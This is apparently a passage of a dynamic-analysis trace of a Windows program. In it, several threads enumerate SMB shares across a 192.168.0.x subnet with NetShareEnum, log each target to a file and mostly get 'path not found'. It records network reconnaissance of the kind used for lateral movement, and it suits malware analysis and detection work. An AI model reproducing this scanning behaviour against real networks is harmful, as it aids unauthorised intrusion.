WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.245", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.209] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.245", cchWideChar=15, lpMultiByteStr=0x1e8324c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.245", lpUsedDefaultChar=0x0) returned 15 [0211.209] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x519fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x519fc2c*=0x80, lpOverlapped=0x0) returned 1 [0211.383] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x519ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0211.383] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.383] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0211.383] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x519ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0211.383] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.383] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0211.383] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x519fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x519fc54*=0x11, lpOverlapped=0x0) returned 1 [0211.389] NetShareEnum (in: servername="\\\\192.168.0.245", level=0x1, bufptr=0x519fedc, prefmaxlen=0xffffffff, entriesread=0x519fed4, totalentries=0x519fed0, resume_handle=0x519fecc | out: bufptr=0x519fedc, entriesread=0x519fed4, totalentries=0x519fed0, resume_handle=0x519fecc) returned 0x35 [0258.073] SetEvent (hEvent=0x1dc) returned 1 [0258.073] RtlExitUserThread (Status=0x0) Thread: id = 59 os_tid = 0xc88 [0088.894] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.42", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0088.894] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.42", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.42", lpUsedDefaultChar=0x0) returned 14 [0088.894] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x52dec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0088.894] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.895] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0088.895] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x52dec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0088.895] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.895] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0088.895] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x52dfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x52dfc54*=0x10, lpOverlapped=0x0) returned 1 [0088.960] NetShareEnum (in: servername="\\\\192.168.0.42", level=0x1, bufptr=0x52dfedc, prefmaxlen=0xffffffff, entriesread=0x52dfed4, totalentries=0x52dfed0, resume_handle=0x52dfecc | out: bufptr=0x52dfedc, entriesread=0x52dfed4, totalentries=0x52dfed0, resume_handle=0x52dfecc) returned 0x35 [0144.283] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.95", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0144.283] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.95", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.95", lpUsedDefaultChar=0x0) returned 14 [0144.283] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x52dec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0144.283] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.283] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0144.284] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x52dec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0144.284] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.284] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0144.284] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x52dfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x52dfc54*=0x10, lpOverlapped=0x0) returned 1 [0144.287] NetShareEnum (in: servername="\\\\192.168.0.95", level=0x1, bufptr=0x52dfedc, prefmaxlen=0xffffffff, entriesread=0x52dfed4, totalentries=0x52dfed0, resume_handle=0x52dfecc | out: bufptr=0x52dfedc, entriesread=0x52dfed4, totalentries=0x52dfed0, resume_handle=0x52dfecc) returned 0x35 [0178.300] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.164", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0178.300] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.164", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.164", lpUsedDefaultChar=0x0) returned 15 [0178.300] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x52dec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0178.300] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.300] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0178.300] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x52dec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0178.300] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.300] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0178.300] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x52dfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x52dfc54*=0x11, lpOverlapped=0x0) returned 1 [0178.304] NetShareEnum (in: servername="\\\\192.168.0.164", level=0x1, bufptr=0x52dfedc, prefmaxlen=0xffffffff, entriesread=0x52dfed4, totalentries=0x52dfed0, resume_handle=0x52dfecc | out: bufptr=0x52dfedc, entriesread=0x52dfed4, totalentries=0x52dfed0, resume_handle=0x52dfecc) returned 0x35 [0211.207] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.240", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.207] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.240", cchWideChar=15, lpMultiByteStr=0x1e831ac, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.240", lpUsedDefaultChar=0x0) returned 15 [0211.208] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x52dfc2c, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x52dfc2c*=0x80, lpOverlapped=0x0) returned 1 [0211.465] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x52dec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0211.465] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.465] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0211.466] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x52dec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0211.466] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.466] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0211.466] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x52dfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x52dfc54*=0x11, lpOverlapped=0x0) returned 1 [0211.466] NetShareEnum (in: servername="\\\\192.168.0.240", level=0x1, bufptr=0x52dfedc, prefmaxlen=0xffffffff, entriesread=0x52dfed4, totalentries=0x52dfed0, resume_handle=0x52dfecc | out: bufptr=0x52dfedc, entriesread=0x52dfed4, totalentries=0x52dfed0, resume_handle=0x52dfecc) returned 0x35 [0258.007] SetEvent (hEvent=0x1dc) returned 1 [0258.007] RtlExitUserThread (Status=0x0) Thread: id = 60 os_tid = 0xc8c [0088.877] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.39", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0088.877] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.39", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.39", lpUsedDefaultChar=0x0) returned 14 [0088.877] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x541ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0088.877] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.877] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0088.877] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x541ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0088.877] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.877] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0088.878] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x541fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x541fc54*=0x10, lpOverlapped=0x0) returned 1 [0088.882] NetShareEnum (in: servername="\\\\192.168.0.39", level=0x1, bufptr=0x541fedc, prefmaxlen=0xffffffff, entriesread=0x541fed4, totalentries=0x541fed0, resume_handle=0x541fecc | out: bufptr=0x541fedc, entriesread=0x541fed4, totalentries=0x541fed0, resume_handle=0x541fecc) returned 0x35 [0144.206] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.88", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0144.206] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.88", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.88", lpUsedDefaultChar=0x0) returned 14 [0144.206] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x541ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0144.206] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.206] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0144.206] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x541ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0144.206] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.206] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0144.206] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x541fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x541fc54*=0x10, lpOverlapped=0x0) returned 1 [0144.211] NetShareEnum (in: servername="\\\\192.168.0.88", level=0x1, bufptr=0x541fedc, prefmaxlen=0xffffffff, entriesread=0x541fed4, totalentries=0x541fed0, resume_handle=0x541fecc | out: bufptr=0x541fedc, entriesread=0x541fed4, totalentries=0x541fed0, resume_handle=0x541fecc) returned 0x35 [0178.117] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.139", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0178.117] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.139", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.139", lpUsedDefaultChar=0x0) returned 15 [0178.117] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x541ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0178.117] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.117] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0178.117] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x541ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0178.117] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.117] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0178.117] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x541fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x541fc54*=0x11, lpOverlapped=0x0) returned 1 [0178.123] NetShareEnum (in: servername="\\\\192.168.0.139", level=0x1, bufptr=0x541fedc, prefmaxlen=0xffffffff, entriesread=0x541fed4, totalentries=0x541fed0, resume_handle=0x541fecc | out: bufptr=0x541fedc, entriesread=0x541fed4, totalentries=0x541fed0, resume_handle=0x541fecc) returned 0x35 [0211.193] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.217", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.193] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.217", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.217", lpUsedDefaultChar=0x0) returned 15 [0211.193] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x541ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0211.193] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.193] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0211.193] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x541ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0211.193] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.193] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0211.193] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x66, lpNumberOfBytesWritten=0x541fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x541fc54*=0x66, lpOverlapped=0x0) returned 1 [0211.275] NetShareEnum (in: servername="\\\\192.168.0.217", level=0x1, bufptr=0x541fedc, prefmaxlen=0xffffffff, entriesread=0x541fed4, totalentries=0x541fed0, resume_handle=0x541fecc | out: bufptr=0x541fedc, entriesread=0x541fed4, totalentries=0x541fed0, resume_handle=0x541fecc) returned 0x35 [0258.082] SetEvent (hEvent=0x1dc) returned 1 [0258.082] RtlExitUserThread (Status=0x0) Thread: id = 61 os_tid = 0xc90 [0088.883] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.40", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0088.883] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.40", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.40", lpUsedDefaultChar=0x0) returned 14 [0088.883] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x555ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0088.883] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.883] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0088.883] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x555ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0088.883] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.883] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, 